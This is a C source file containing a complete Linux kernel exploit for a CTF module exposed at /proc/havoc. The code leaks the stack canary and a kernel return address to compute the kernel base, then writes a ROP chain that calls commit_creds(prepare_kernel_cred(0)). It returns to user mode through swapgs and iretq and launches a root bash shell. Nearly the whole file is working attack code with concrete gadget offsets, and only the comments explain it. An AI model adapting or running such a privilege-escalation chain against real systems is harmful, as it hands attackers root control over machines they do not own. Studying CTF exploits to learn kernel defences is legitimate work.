/* Build: gcc exp.c -o exp -static -no-pie */
#include <stdio.h> | |
#include <stdlib.h> | |
#include <unistd.h> | |
#include <fcntl.h> | |
#include <sys/stat.h> | |
#include <string.h> | |
#include <stdint.h> | |
#include <sys/mman.h> | |
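/*
 * Final stage, entered in ring 3 through the iretq frame that main() builds:
 * announce success and replace the process image with a shell.
 *
 * At this point we are running on the stack main() handed to iretq, not on
 * the original user stack, so this function must never return: if execl()
 * fails we _exit() instead of falling off the end into whatever that stack
 * happens to hold.
 */
void launch_shell(void) {
    static const char banner[] = "Welcome root shell\n";

    /* sizeof - 1: do not write the terminating NUL byte to stdout. */
    write(1, banner, sizeof(banner) - 1);
    /* The variadic sentinel must be a pointer, hence the explicit cast. */
    execl("/bin/bash", "bash", (char *)NULL);
    /* Only reached if execl() failed; returning is not an option here. */
    _exit(1);
}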
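/*
 * User-mode CS, SS and RFLAGS, captured before the attack. The iretq frame
 * at the end of the ROP chain is built from these so that execution lands
 * back in ring 3 (at launch_shell) with sane segment selectors and flags.
 */
unsigned long user_cs, user_ss, user_rflags;

/*
 * Snapshot the current (user-mode) CS, SS and RFLAGS into the globals above.
 * Must run before the payload is assembled; main() calls it.
 *
 * __asm__ rather than asm: the bare keyword is a GNU extension that is not
 * recognised under strict -std=c11, while the double-underscore spelling is
 * accepted in every std mode. x86-64 only (pushfq/popq, 64-bit operands).
 */
static void save_state(void) {
    __asm__ volatile(
        "movq %%cs, %0\n"
        "movq %%ss, %1\n"
        "pushfq\n"
        "popq %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
        :
        : "memory");
}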
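/*
 * Kernel base the gadget addresses in the trailing comment were dumped
 * against (no KASLR). Gadgets given as absolute addresses are rebased onto
 * the leaked runtime base with kaddr().
 */
#define NOPIE_KBASE 0xffffffff81000000UL

/* Layout of the driver's leak and of the overflowing write, in bytes. */
enum {
    IO_SIZE        = 0x100,          /* size of one read()/write() on /proc/havoc */
    LEAK_CANARY_OFF = 1,             /* stack canary inside the leaked frame */
    LEAK_RET_OFF   = 1 + 8 + 8 + 8,  /* saved return address, three qwords later */
    CHAIN_OFF      = LEAK_RET_OFF,   /* the ROP chain overwrites from the return address on */
    RET_TO_KBASE   = 0x31af11        /* leaked return address minus kernel base */
};

/* Translate an absolute no-KASLR kernel address into the running kernel. */
static unsigned long kaddr(unsigned long kbase, unsigned long nopie_addr) {
    return kbase + (nopie_addr - NOPIE_KBASE);
}

/*
 * Exploit driver for /proc/havoc (CTF kernel module):
 *   1. read() the driver's stack frame to recover the canary and a return
 *      address, from which the kernel base is derived;
 *   2. build a ROP chain commit_creds(prepare_kernel_cred(0)) followed by
 *      swapgs ; iretq back to launch_shell in ring 3;
 *   3. write() it back, keeping the canary intact so the overflow survives
 *      the stack-protector check.
 *
 * Returns EXIT_FAILURE when any preparatory step fails and 0 if the user
 * declines to fire; on a successful attack it never returns (iretq lands in
 * launch_shell, which execs a shell).
 */
int main(void) {
    int fd = open("/proc/havoc", O_RDWR);
    if (fd < 0) {
        perror("Cannot open /proc/havoc");
        return EXIT_FAILURE;
    }

    /* Stack launch_shell will run on after iretq; must exist before we jump. */
    char *tmpstack = mmap(NULL, 0x8000, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (tmpstack == MAP_FAILED) {
        perror("Cannot mmap tmpstack");
        return EXIT_FAILURE;
    }
    printf("tmpstack: %p\n", (void *)tmpstack);

    /* Info leak: read() hands back a copy of the driver's stack frame. */
    unsigned char leak[IO_SIZE];
    ssize_t got = read(fd, leak, sizeof leak);
    if (got < (ssize_t)(LEAK_RET_OFF + sizeof(unsigned long))) {
        fprintf(stderr, "short read from /proc/havoc (%zd bytes): no usable leak\n", got);
        return EXIT_FAILURE;
    }

    /* Both fields sit at odd offsets: memcpy rather than an unaligned cast. */
    unsigned long canary, retaddr;
    memcpy(&canary, leak + LEAK_CANARY_OFF, sizeof canary);
    memcpy(&retaddr, leak + LEAK_RET_OFF, sizeof retaddr);

    unsigned long kbase = retaddr - RET_TO_KBASE;
    /*
     * Sanity-check the leak before building on it: a kernel text address
     * lives in the upper half and the image base is page-aligned. Firing a
     * chain derived from garbage only panics the box.
     */
    if (!(retaddr >> 63) || (kbase & 0xfff)) {
        fprintf(stderr, "leaked return address %#lx does not look like kernel text\n", retaddr);
        return EXIT_FAILURE;
    }
    unsigned long commit_creds        = kbase + 0xb5765;
    unsigned long prepare_kernel_cred = kbase + 0xb5b15;

    printf("canary\t\t\t: %#lx\n", canary);
    printf("retaddr\t\t\t: %#lx\n", retaddr);
    printf("kbase\t\t\t: %#lx\n", kbase);
    printf("commit_creds\t\t: %#lx\n", commit_creds);
    printf("prepare_kernel_cred\t: %#lx\n", prepare_kernel_cred);

    save_state();

    /*
     * ROP chain, in the order it is written past the saved return address.
     * r8 and rdx are zeroed first so the cmp inside the mov rdi, rax gadget
     * compares equal and its jne is not taken.
     */
    unsigned long chain[] = {
        kbase + 0x838d0,                    /* pop rdi ; ret */
        0,                                  /* rdi = 0 */
        prepare_kernel_cred,                /* rax = prepare_kernel_cred(0) */
        kaddr(kbase, 0xffffffff81461ac2),   /* pop r8 ; ret */
        0,                                  /* r8 = 0 */
        kaddr(kbase, 0xffffffff810ea1b9),   /* pop rdx ; ret */
        0,                                  /* rdx = 0 */
        kaddr(kbase, 0xffffffff81120c57),   /* mov rdi, rax ; cmp r8, rdx ; jne ... ; pop rbp ; ret */
        0,                                  /* rbp = 0 */
        commit_creds,                       /* commit_creds(rdi) */
        kaddr(kbase, 0xffffffff8106d8b4),   /* swapgs ; pop rbp ; ret */
        0,                                  /* rbp = 0 */
        kaddr(kbase, 0xffffffff8103625b),   /* iretq */
        (unsigned long)launch_shell,        /* RIP */
        user_cs,                            /* CS */
        user_rflags,                        /* RFLAGS */
        (unsigned long)(tmpstack + 0x4000), /* RSP: middle of the fresh mapping */
        user_ss                             /* SS */
    };
    _Static_assert(CHAIN_OFF + sizeof chain <= IO_SIZE, "ROP chain does not fit in one write");

    /*
     * Payload: the leaked prefix (canary and two saved qwords) goes back
     * unchanged, the chain follows from the return-address slot. Zero-filled
     * so no uninitialised stack bytes are sent along with it.
     */
    unsigned char payload[IO_SIZE] = {0};
    memcpy(payload, leak, CHAIN_OFF);
    memcpy(payload + CHAIN_OFF, chain, sizeof chain);

    size_t nent = sizeof chain / sizeof chain[0];
    for (size_t i = 0; i < nent; i++) {
        printf("%#lx\n", chain[i]);
    }
    printf("Payload build sucessfully!\n");

    printf("Do you want to attack? (Y/N) ");
    fflush(stdout); /* prompt has no newline; show it before blocking on stdin */
    char ans[8];
    if (fgets(ans, sizeof ans, stdin) == NULL) {
        fputs("\nno answer read, not attacking\n", stderr);
        return EXIT_FAILURE;
    }
    if (ans[0] == 'Y' || ans[0] == 'y') {
        /* On success this write never returns: the chain iretq's into launch_shell. */
        if (write(fd, payload, sizeof payload) < 0) {
            perror("write /proc/havoc");
            return EXIT_FAILURE;
        }
    }
    close(fd);
    return 0;
}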
/*
 * Gadget addresses, listed against the no-KASLR image base 0xffffffff81000000;
 * main() rebases each one onto the leaked runtime base before use.
 *
 * 0xffffffff81120c57 : mov rdi, rax ; cmp r8, rdx ; jne 0xffffffff81120c45 ; pop rbp ; ret
 * 0xffffffff81461ac2 : pop r8 ; ret
 * 0xffffffff810ea1b9 : pop rdx ; ret
 * 0xffffffff81882b3a : iretd ;                        (not used by the chain; the iretq below is)
 * 0xffffffff8106d8b4 : swapgs ; pop rbp ; ret
 * 0xffffffff8103625b : 48 cf  iretq
 */